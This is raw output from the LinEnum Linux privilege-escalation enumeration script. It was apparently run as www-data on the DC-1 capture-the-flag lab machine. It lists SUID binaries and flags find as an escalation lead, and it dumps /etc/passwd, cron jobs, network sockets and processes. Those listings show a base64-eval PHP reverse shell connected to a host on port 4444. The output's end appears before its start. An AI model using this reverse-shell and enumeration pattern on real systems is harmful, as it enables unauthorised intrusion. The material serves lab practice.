ii gcc 4:4.7.2-1 i386 GNU C compiler
ii gcc-4.7 4.7.2-5 i386 GNU C compiler
ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)
ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) [00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow [00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs [00;33m[+] Possibly interesting SUID files:[00m
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find [00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf
-rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf
-rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf
-rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf
-rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
-rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit [00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .
drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. [00;33m### SCAN COMPLETE ####################################[00m [00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.95[00m [-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m [00;33mScan started at:
Tue May 7 01:08:52 AEST 2019
[00m [00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux [00;31m[-] Kernel information (continued):[00m
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1 [00;31m[-] Specific release information:[00m
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/" [00;31m[-] Hostname:[00m
DC-1 [00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data) [00;31m[-] Users that have previously logged onto the system:[00m
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019 [00;31m[-] Who else is logged on:[00m
01:08:52 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4) [00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash [00;31m[-] Super user account(s):[00m
root [00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 [00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes [00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env [00;31m[-] Path information:[00m
/usr/local/bin:/usr/bin:/bin [00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash [00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx [00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK 022 [00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512 [00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab /etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 510 May 10 2018 php5 /etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 633 May 30 2018 apache2
-rwxr-xr-x 1 root root 14985 Oct 24 2014 apt
-rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude
-rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 May 3 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base
-rwxr-xr-x 1 root root 89 May 17 2012 logrotate
-rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db
-rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate
-rwxr-xr-x 1 root root 249 May 26 2012 passwd /etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder /etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 907 Jun 19 2012 man-db [00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do. SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# [00;33m### NETWORKING ##########################################[00m
[00;31m[-] Network and IP info:[00m
eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8711 errors:0 dropped:0 overruns:0 frame:0
TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB) lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) [00;31m[-] ARP history:[00m
192.168.16.112 dev eth0 INCOMPLETE [00;31m[-] Nameserver(s):[00m
nameserver 192.168.16.254
nameserver 0.0.0.0 [00;31m[-] Default route:[00m
default via 192.168.16.254 dev eth0 [00;31m[-] Listening TCP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - [00;31m[-] Listening UDP:[00m
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:59942 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:769 0.0.0.0:* -
udp 0 0 127.0.0.1:801 0.0.0.0:* -
udp 0 0 0.0.0.0:21881 0.0.0.0:* -
udp6 0 0 :::52815 :::* -
udp6 0 0 :::28256 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::769 :::* - [00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]
root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]
root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]
root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]
root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]
root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]
root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]
root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]
root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]
root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]
root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]
root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]
root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]
root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]
root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]
root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]
root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]
root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]
root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]
root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]
root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]
root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]
root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]
root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]
root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]
root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]
root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]
root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]
root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]
root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]
root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]
root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]
root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]
root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]
root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]
root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]
root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]
root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]
root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]
root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]
root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]
root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]
root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]
root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]
root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]
root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]
root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]
root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon
root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]
root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]
root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w
statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd
root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon
root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]
root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]
root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd
root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5
root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid
root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start
daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd
103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start
www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start
root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron
root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error
101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m
root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2
root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3
root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4
root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5
root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6
root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]
root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd
root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1
www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(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.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));'
www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(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.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));
www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh
www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh
root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]
root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]
www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a
www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux [00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
-rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty
-rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind
-rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd
-rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd [00;31m[-] /etc/init.d/ binary permissions:[00m
total 280
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start
-rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop
-rw-r--r-- 1 root root 2427 Oct 16 2012 README
-rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid
-rwxr-xr-x 1 root root 7820 May 26 2018 apache2
-rwxr-xr-x 1 root root 1071 Jun 25 2011 atd
-rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs
-rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh
-rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh
-rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup
-rwxr-xr-x 1 root root 3033 Jul 3 2012 cron
-rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus
-rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4
-rwxr-xr-x 1 root root 1329 Oct 16 2012 halt
-rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh
-rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh
-rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd
-rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup
-rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs
-rwxr-xr-x 1 root root 1990 May 21 2012 kmod
-rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans
-rwxr-xr-x 1 root root 995 Oct 16 2012 motd
-rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh
-rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh
-rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh
-rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh
-rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
